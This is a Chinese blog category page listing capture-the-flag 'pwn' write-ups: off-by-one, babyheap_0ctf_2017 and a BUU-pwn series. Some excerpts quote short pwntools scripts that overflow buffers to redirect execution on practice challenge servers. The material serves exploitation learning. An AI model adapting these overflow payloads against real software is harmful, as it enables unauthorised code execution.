pwn
文章平均质量分 78
Ff.cheng
这个作者很懒,什么都没留下…
展开
-
off-by-one (b00ks)
off_by_one原创 2022-11-18 22:45:17 · 1223 阅读 · 0 评论 -
BUU-pwn(六)
BUU-pwn(六)原创 2022-09-14 23:44:23 · 203 阅读 · 0 评论 -
BUU-pwn(五)
BUU-pn(五)原创 2022-09-10 21:04:43 · 255 阅读 · 0 评论 -
babyheap_0ctf_2017
babyheap_0ctf_2017原创 2022-09-10 18:00:53 · 1090 阅读 · 0 评论 -
BUU-pwn(四)
BUU-pwn(四)原创 2022-09-04 23:55:00 · 162 阅读 · 0 评论 -
BUU-pwn(三)
pwn(三)原创 2022-06-19 22:57:13 · 244 阅读 · 0 评论 -
BUU-pwn(二)
ciscn_2019_n_832位程序,逻辑很简单 需要var[13] == 17需要注意的是qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的四倍,8字节 所以用p64expfrom pwn import *r = remote('node4.buuoj.cn',29396)payload = b'aaaa'*13+p64(0x11)r.sendline(p原创 2022-04-27 13:57:43 · 301 阅读 · 0 评论 -
BUU-pwn(一)
rip简单栈溢出,后门函数expfrom pwn import *#io=process("./pwn")r = remote('node4.buuoj.cn',25253)payload=b'a'*0xf+b'a'*0x08+p64(0x0401187)r.sendline(payload)r.interactive()warmup_csaw_2016后门函数 int sub_40060D() 泄露地址expfrom pwn import *#io=process("./pw原创 2022-04-24 00:40:45 · 300 阅读 · 0 评论